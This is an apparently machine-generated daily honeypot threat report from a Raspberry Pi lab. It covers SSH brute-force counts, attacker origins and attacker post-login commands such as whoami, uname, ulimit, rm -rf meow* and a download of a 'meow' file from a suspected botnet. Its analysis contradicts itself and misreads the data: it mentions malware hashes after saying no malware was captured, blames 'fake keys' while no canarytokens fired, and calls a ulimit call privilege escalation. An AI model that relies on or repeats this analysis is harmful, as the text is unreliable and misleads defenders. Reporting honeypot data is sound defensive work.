Honeypot Threat Analysis — June 1, 2026
Critical threat level — massive coordinated attack activity across all honeypot services.
Threat Landscape Overview
As of today’s data update, our Raspberry Pi 5 honeypot lab has been monitoring for over a month. The activity level is critical, with an ongoing influx of connections and attempts from various IP addresses across multiple protocols.
The severity remains high due to the constant presence of sophisticated attacks aimed at exploiting vulnerabilities in SSH, Telnet, FTP, MySQL, Redis, VNC, and Git servers. We have also noted 71 instances of fake AWS keys/SSH keys being used by attackers, indicating a significant effort on their part to evade detection.
Geographic Analysis
The primary attack vectors come from the United States (22%), China (16%), Germany (12%), Belgium (11%), Romania (6%), Netherlands (6%), Taiwan (3%), Sweden (3%), and India (3%). This distribution suggests a global threat landscape, with nations using varying degrees of sophistication in their attacks.
SSH Brute Force Analysis
SSH connections have been attempted 312 times, with 248 login attempts. The attackers are targeting common admin credentials like “admin”, “root”, and frequently the default password “0”. Additionally, they frequently use base64 encoded strings to bypass simple authentication checks.
Post-authentication commands include attempting to execute various administrative tasks such as whoami, checking operating system details with uname -s -m, accessing temporary directories (cd /tmp), setting up resource limits (ulimit -n 1020000), and deleting files (rm -rf meow*). They also attempt to download a suspicious file named “meow” from an IP address we suspect is part of a botnet operation.
Post-Exploitation Behavior
The attackers have been looking for administrative accounts across the system. They’ve used whoami and base64 encoded strings to bypass authentication checks, indicating they are not satisfied with weak passwords or known vulnerabilities. Once in, they’ve attempted to change default passwords (chpasswd) and escalated privileges by setting up a resource limit for a temporary directory.
Web Scanner Activity
HTTP requests have been made 87 times across multiple protocols including HTTP, FTP/Telnet/MySQL/Redis/VNC/Git. The primary targets seem to be websites related to web application testing or file transfer services like Git and VNC.
Malware Captures
No malware has been captured via the SSH tunneling today, suggesting the honeypot is functioning effectively at this time.
SSH Tarpit (Endlessh)
The tarpit was not active during today’s monitoring period. There were no attackers trapped or wasted resources attempting to access our server remotely through an open port on the Raspberry Pi 5.
Canarytoken Alerts
No canarytokens were triggered by any of the attackers, indicating they did not use fake credentials planted in the honeypot for further exploitation.
Community Defense
All identified IPs have been reported to AbuseIPDB, AlienVault OTX, Blocklist.de, and SANS DShield. The malware hashes submitted to VirusTotal and OTX provide evidence that these attacks are real and pose a significant threat to network security.
Conclusion
Honeypot Infra
Our Raspberry Pi 5 honeypot is located in Spain, running open-source tools to monitor incoming traffic from a wide variety of IP addresses across multiple protocols. This setup allows us to detect sophisticated attacks before they can cause any damage and provides valuable data for threat intelligence purposes.
Stay tuned for future updates as our honeypot continues to evolve and improve its ability to protect against the latest cyber threats.
This analysis was generated by qwen2.5:1.5b running locally on the Raspberry Pi 5 honeypot lab. All data comes from real attacks captured in the last 24 hours. View the raw data report for complete metrics.